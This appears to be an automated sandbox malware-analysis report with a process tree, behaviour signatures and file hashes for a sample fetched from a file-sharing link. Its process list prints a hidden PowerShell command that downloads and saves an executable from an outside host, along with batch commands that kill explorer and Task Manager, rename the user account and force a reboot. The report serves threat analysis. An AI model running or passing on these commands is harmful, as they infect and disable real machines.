Analysis
-
max time kernel
129s -
max time network
145s -
platform
windows10-2004_x64 -
resource
win10v2004-20230221-en -
resource tags
-
submitted
28-03-2023 10:55
Errors
General
-
Target
https://yadi.sk/d/WemMDKVy3KXPcy
Malware Config
Extracted
http://french-cooking.com/myguy.exe
Extracted
http://french-cooking.com/myguy.exe
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Disables Task Manager via registry modification
-
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
-
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
-
Drops file in Program Files directory 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Kills process with taskkill 2 IoCs
-
Modifies registry class 5 IoCs
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 16 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 19 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell start shell:Appsfolder\Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge https://yadi.sk/d/WemMDKVy3KXPcy1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --edge-redirect=Windows.Launch https://yadi.sk/d/WemMDKVy3KXPcy1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xf8,0xd4,0x7ff817c246f8,0x7ff817c24708,0x7ff817c247182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2092 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2220 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2652 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5800 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5864 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5972 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6864 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7048 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6928 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7268 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings2⤵
- Drops file in Program Files directory
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x224,0x228,0x22c,0x1fc,0x230,0x7ff7b10b5460,0x7ff7b10b5470,0x7ff7b10b54803⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7268 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6584 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3716 /prefetch:82⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4340 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5956 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3968 /prefetch:12⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3672 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5968 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2104,10548610190316921330,16216119942880128532,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5616 /prefetch:12⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\Ci_pBL9wTn-e_O4CKVlChw\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\18885.exe');2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Downloads\Ci_pBL9wTn-e_O4CKVlChw\myguy.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden (New-Object System.Net.WebClient).DownloadFile('http://french-cooking.com/myguy.exe', 'C:\Users\Admin\AppData\Roaming\34692.exe');2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x50c 0x3f41⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Downloads\000.exe"C:\Users\Admin\Downloads\000.exe"1⤵
- Enumerates connected drives
- Sets desktop wallpaper using registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\windl.bat""2⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im explorer.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im taskmgr.exe3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic useraccount where name='Admin' set FullName='UR NEXT'3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic useraccount where name='Admin' rename 'UR NEXT'3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\shutdown.exeshutdown /f /r /t 03⤵
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa39af055 /state1:0x41c64e6d1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.logFilesize
1KB
MD54280e36a29fa31c01e4d8b2ba726a0d8
SHA1c485c2c9ce0a99747b18d899b71dfa9a64dabe32
SHA256e2486a1bdcba80dad6dd6210d7374bd70ae196a523c06ceda71370fd3ea78359
SHA512494fe5f0ade03669e5830bed93c964d69b86629440148d7b0881cf53203fd89443ebff9b4d1ee9d96244f62af6edede622d9eacba37f80f389a0d522e4ad4ea4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD55a10efe23009825eadc90c37a38d9401
SHA1fd98f2ca011408d4b43ed4dfd5b6906fbc7b87c0
SHA25605e135dee0260b4f601a0486401b64ff8653875d74bf259c2da232550dbfb4f5
SHA51289416a3f5bf50cd4a432ac72cd0a7fb79d5aeb10bdcc468c55bbfa79b9f43fab17141305d44cb1fe980ec76cc6575c27e2bcfcbad5ccd886d45b9de03fb9d6d7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5c1a3c45dc07f766430f7feaa3000fb18
SHA1698a0485bcf0ab2a9283d4ebd31ade980b0661d1
SHA256adaba08026551b1b8f6c120143686da79f916d02adbef4a8d1c184e32a19fd48
SHA5129fc93f01ab4b14f555791d757ffe881787cc697102547c61847552e597e206e70c6d35fedff559c72a0a67d1b95e769095ecb0a8a7d4f07cf58a7a0d57d3e9f4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD52df5a75a51d348fdc243927876040b2d
SHA1d329ff37709ac43de78d5674c89eab0719df044f
SHA256434bfe95791e0ca85742171d4f4414fac8b115570696e73b7dd610206d95939f
SHA512280e5fed2b07898cdaa8994cbc32e2b2dd96e0de6379e1ac619a494ad6f313f820adfb05538ee3e65d2078f13bc8299db2e84727e984a5a215a82c34d1344e7b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
648B
MD58dcb3f2a26b8a5db486855d875344210
SHA1df200cca87e648d47525de8fa0666dd79683f3fc
SHA2569367322462fec457ae2b50fa5a22ce6d20edfdca83b31cbfdac679f7ffed33db
SHA5124e93c4792a2746e714800afe0c75168680590aa92f67b06d09f4e476d9e925004b7c2e96fe251b416f4d4f95e6f1c00bde9df478334778737187df3bcad0b23d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe56f4d4.TMPFilesize
48B
MD5fef1c0d191b6b1c787966de1eb2b23be
SHA1b7fedfdeb94e651778be7f34fe0373c74ea5dfc0
SHA256cff583113898880be47fa33062899ceced73cc76a9448df000a62d94b58543b7
SHA5123b1d7525c764aaf31a2c006bbc5b74b36babf8bf45917114f204c35ddbae1dc1c1f3c8e1fd4791eb717af5a696804524afb3c89e4d64c9505bb3cec39d743fd3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.icoFilesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\MANIFEST-000001Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnkFilesize
2KB
MD5ef850d9cf647fec0950dee4ba93de9e7
SHA1b275ec4e5baa766db33a90177b261b37c66a4efa
SHA25662609c1001cd6090d1ec0f38afee48bd6947eea3024289393998cf23986d58d8
SHA512dbeaab509e000cd586261a77571492394f21e2548947d0b107b8c60930889d37bd84e3d499a1b5b85a4c11d0d4911520aaf68b165468bfe46aa9e4368d19de86
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
1KB
MD517629d658141696736f6d81bcf3e9497
SHA16f5dc91744728b18c5751553cd7b26a2ba14dae1
SHA25657b97c4092e8490ef033a2b63ca99127acd4a881bdded4de3ef19167c686bc60
SHA512d75048e4fd9b6f84ebe4b30ccd33383a11c741bbbaaaaf2c97bd768b9f9b821ab065e2ca39201214114bbb870262c440d4858242de47425eb61e82f0407576a4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
4KB
MD594f5325f0f39dedf9c428986f45ea17a
SHA1ebd7c269eb27d512cd4e35b52f7317614ee2d5dc
SHA25677f18207bc9b2ddade46feb7646d5fd781a0b5b1245daa9e9ad4ac08e14c900c
SHA5128f2fede198aa5218a995a87613e5cdbc8c6ef2c0ef4b2edce7fe46a67f3b58016dd2bdc9fa753de455ede0b261759d15c68e70ec9783df4c8a6a633d7e134439
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5ad6b38ff3d10d2e12c0fb100eefb85fe
SHA16c76dca3219df2b18ffd5855bc83c103927a0945
SHA256d33b4979ec6c599d1403aa895189b307d23cc357ede361097fb932057cea0653
SHA512aa70c557d29f441f7c525cc57379f5e0bc03285153b60d9a3673547615c6a59f81f5427451072594dda0fd480862c9a81391339c6fcc8130d7333d7d823650cf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD513cb7a4641ddf54fb3314c7a33dc9a6c
SHA1bc1e8db549324e74d831bccbc9e714b2177a1a7c
SHA25601afd8466fbf3cb64911034fde5ad0013fd1025da40745b052bab84be0a90ab8
SHA512d9edb9978502c898e1c386eef85ebcc848c149969acb5aca63afb105e5d37018660963d2e21252fca96dba36c214334db28ebe7b7f2ea7d50658222eff2f4a71
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
7KB
MD5505acbdb842a8bfc22de1d6b39d504dd
SHA1efb0a58856099bc7fb0dbb58114f2baeec89a149
SHA256cad11e8091c36fb3cb5bbf827f3c17fdf2bf8ec9debf99da360c93375f1bb086
SHA512e43c4bce8af52b41a070ca3ec03ca561046d13cb33dfa4ce464a6b29c396ecb3bb3f083a4fb03facc243e47feed8f4dc02fa095c073011005372f8f6186be35c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD53c5d54a2eda56d6543a0af7f73ccfede
SHA12733715a677bede0eb4a28fe07acc811ae236afa
SHA256ce9109be7fdf3fe26560e6df8a96bb8fa4a9ad45d0fa022cfa6de72279ccd8d0
SHA5122ac6f9e90f062c2d4258adcdc2f1a0ca248fa6a33ae7c23629ec71eebc7b453f31412a46d059ff286a50522bf8fa4da92ab99cd6dfde37830779463fb03134a7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure PreferencesFilesize
24KB
MD55edab6d3ffbeee247ccb4423f929a323
SHA1a4ad201d149d59392a2a3163bd86ee900e20f3d9
SHA256460cddb95ea1d9bc8d95d295dd051b49a1436437a91ddec5f131235b2d516933
SHA512263fa99f03ea1ef381ca19f10fbe0362c1f9c129502dc6b730b076cafcf34b40a70ee8a0ee9446ec9c89c3a2d9855450609ec0f8cf9d0a1b2aebdd12be58d38c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
2KB
MD52d141a5764484a00d812355d136f2fe2
SHA15649b2d0c8b4b4dd1f62c23e15d474ba857cd1a3
SHA2568633995262e0e860364773934cb485017f59e7719e2e67e16a09238ac0655de3
SHA512d2031233f9cfd1d702f8c305b6890ecd18e57b702c6368d81fa2db3c0a2368e39ef052bd14b2cfa0fad2960608a0748c654b086ebde5d76a7ed5c2163ccd66ce
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5161631e4ae4a60d29090e5d9aa7c5288
SHA1dfb495632c515cccefdb4dfc8eeaa4eac4d67965
SHA2565d69190ee6003bc33fde80358d8a162354c1fcf123dc99e99144e0f8b598a34b
SHA512bbb53382ce3351cbcda7517a99840fc5c69e193b10712001c27f75923948899f6b42823f7dd7b48454aca4cdfd1700260344c5cbb0f2dfb4ff302dd951ca78bf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
2KB
MD592e18fba6e9924265502d7ea6ef152c1
SHA15fc38cc56cf3864bdd6c4143fbaea8bfa6029289
SHA25626da473d81b5fff8b7986a05ba780ee8bf36b2a9214bc61b7547a0f72be8525c
